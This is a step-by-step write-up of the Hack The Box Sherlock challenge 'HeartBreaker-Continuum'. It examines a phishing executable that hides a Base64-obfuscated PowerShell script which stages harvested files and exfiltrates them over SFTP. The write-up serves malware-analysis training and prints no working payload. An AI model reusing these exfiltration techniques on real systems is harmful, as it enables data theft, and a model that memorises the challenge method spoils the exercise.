HackTheBox: HeartBreaker-Continuum
Sherlock
Hack The Box - Sherlock Challenge: HeartBreaker-Continuum
Objective:
Your task is to analyze a potentially malicious executable file submitted by a client. The file originated from a phishing email, and you need to determine its functionality and whether it facilitated data exfiltration.
---
Step 1: Get the SHA256 Hash of the Binary
To identify the suspicious binary, we’ll start by obtaining the SHA256 hash. This is a unique identifier for the file, which we can use to check against external databases like VirusTotal.
Tools: PEStudio, VirusTotal, or the `file hash` command.
- I used PEStudio because it provides extensive details about the binary, including its hash, metadata, and other properties.
Once you open the binary in PEStudio, the hash will be displayed in the "File Hashes" section.
---
Step 2: Find the Binary’s Creation Date (UTC)
In PEStudio, you can also find the creation date of the binary in the metadata.
- Look for the “Timestamp” or “Creation Date” in the PE Header or File Metadata section.
---
Step 3: Find the Code Size of the Binary
The code size of a binary provides insight into its complexity and functionality.
- In PEStudio, navigate to the Optional Header section.
- Find the Code Size field, which gives the byte size of the executable's code.
---
Step 4: Determine the Original Filename
It appears that the binary may have undergone a file conversion process. To find the original filename:
- In PEStudio, go to the Resources tab.
- Look for a .NET instance that may point to the original name of the file, which could be a PowerShell script name.
---
Step 5: Identify the Obfuscated Code’s Hexadecimal Offset
To find where the obfuscated code begins:
- In the Resources tab of PEStudio, look for the Location column.
- You will see the starting offset of the obfuscated code in the binary.
---
Step 6: Identify the Encoding Method for Obfuscation
The threat actor likely used an encoding method to hide the script. We can identify this encoding method by:
- Checking the First Bytes in the Resources section of PEStudio.
- This will reveal that the binary uses Base64 encoding.
---
Step 7: Identify the Cmdlet Used to Initiate File Downloads
The binary contains an obfuscated PowerShell script. To identify which cmdlet was used to initiate file downloads:
- Review the strings in the binary. You will notice obfuscated PowerShell code, which is decoded into a script named NewILY.ps1.
- The script involves string reversal and UTF-8 decoding before being invoked.
To fully deobfuscate the PowerShell script, you can write a new script that prints the decoded output instead of executing it.
- Once decoded, you will see the PowerShell code in a readable format, revealing the commands used by the malware.
---
Step 8: Identify Indicators of Compromise (IoCs)
By examining the deobfuscated PowerShell script, you can find potential network-related Indicators of Compromise (IoCs), such as IP addresses.
- Look through the decoded script for any IP addresses or domain names.
- Note these IoCs in ascending order.
---
Step 9: Locate the Staging Directory for Harvested Files
The binary creates a staging directory to store harvested files. To find the directory path:
- In the deobfuscated PowerShell script, look for a destination variable that defines the path for storing files.
- This path will give you the location of the staging directory.
---
Step 10: MITRE Technique for Automated Data Collection
The technique used by the malware to autonomously gather data can be mapped to the MITRE ATT&CK framework. In this case:
- The relevant technique is T1119 Automated Collection.
---
Step 11: Password for Exfiltration
Finally, to find the password used to exfiltrate the collected files:
- Review the PowerShell script for any references to file transfer protocols (like SFTP).
- The password will be visible in a line like: `open sftp://…` in the script.
---
Conclusion:
By following these steps, you’ll analyze the binary, understand its functionality, and uncover any malicious activity it may have caused. This includes identifying the attack methodology, potential data exfiltration routes, and relevant network indicators. Provide a comprehensive report detailing your findings along with recommended mitigation steps.